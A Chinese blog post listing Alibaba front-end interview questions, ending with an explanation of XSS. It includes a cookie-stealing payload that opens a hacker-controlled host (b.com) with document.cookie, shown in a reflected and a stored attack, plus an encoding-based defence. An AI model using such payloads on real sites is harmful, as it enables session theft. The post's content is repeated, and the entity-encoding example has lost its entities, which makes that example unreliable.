ali面试
2016-01-06 17:02
363 查看
1 自己介绍
2 了解的前台和后台技术
3 怎么跨域
4 有没有看过jquery源码
5 了解node.js吗?
6 从输入网址到加载到界面的过程?
7 怎么解决大数据问题。
8 HTML5技术了解。
9 有写微博的习惯吗?写些什么?
10 做过什么项目?
11 数据库了解哪些?对数据库知识学过什么?知道索引吗?
12 缓存问题。
13 amd和cmd的区别
14 图片旋转90°
15 在ul子孩子li上添加事件,该li不一定存在。
1 用户A登陆网站a.com后,他又点击了某个链接,例如:http://www.a.com?content=<script>window.open(“www.b.com?param=”+document.cookie)</script>,而b.com是黑客网站,这样就得到了用户的cookie。
2 用户A和我都登陆了系统,我发表了一篇文章,文章内容有<script>window.open(“www.b.com?param=”+document.cookie)</script>,保存后,A查看该文章,则其信息会泄露给我。
防御为:对用户的输入进行过滤,把< > & "等进行转换为HTML encode,,例如
<为 < >为> &为& "为 
<script>window.location.href=”http://www.baidu.com”;</script>
转为:<script>window.location.href="http://www.baidu.com"</script>存储,在浏览器以文本形式显示。即可。
2 了解的前台和后台技术
3 怎么跨域
4 有没有看过jquery源码
5 了解node.js吗?
6 从输入网址到加载到界面的过程?
7 怎么解决大数据问题。
8 HTML5技术了解。
9 有写微博的习惯吗?写些什么?
10 做过什么项目?
11 数据库了解哪些?对数据库知识学过什么?知道索引吗?
12 缓存问题。
13 amd和cmd的区别
14 图片旋转90°
15 在ul子孩子li上添加事件,该li不一定存在。
16 xss攻击
xss(Cross Site Scripting)跨站脚本攻击,恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的特殊目的。主要来自内部和外部的攻击。1 用户A登陆网站a.com后,他又点击了某个链接,例如:http://www.a.com?content=<script>window.open(“www.b.com?param=”+document.cookie)</script>,而b.com是黑客网站,这样就得到了用户的cookie。
2 用户A和我都登陆了系统,我发表了一篇文章,文章内容有<script>window.open(“www.b.com?param=”+document.cookie)</script>,保存后,A查看该文章,则其信息会泄露给我。
防御为:对用户的输入进行过滤,把< > & "等进行转换为HTML encode,,例如
<为 < >为> &为& "为 
<script>window.location.href=”http://www.baidu.com”;</script>
转为:<script>window.location.href="http://www.baidu.com"</script>存储,在浏览器以文本形式显示。即可。
相关文章推荐
- 2015网易游戏笔试题04
- 2015网易游戏笔试02
- 2015互联网校招总结
- [全职] 摩根大通-量化金融-北京
- 校招面试要点
- 京东2015校招笔试编程题
- 亚马逊2015校招在线笔试2
- 校招一月总结,学生生涯倒计时
- 2015(2016届)校园招聘季——内推 篇
- 2015(2016届)校园招聘季——酷派 篇
- 2015(2016届)校园招聘季——华为 篇
- 谷歌技术面试要点(Google面试)(14年5月20日交大专场)
- 软件工程师经验
- 校招【 笔试面试 】准备之C语言 基础知识一
- 校招回忆录---华为篇(上)
- 校招回忆录---华为篇(下)
- 校招回忆录---小米篇
- 校招回忆录---骆驼篇
- 校招回忆录---度娘篇
- 校招回忆录---企鹅篇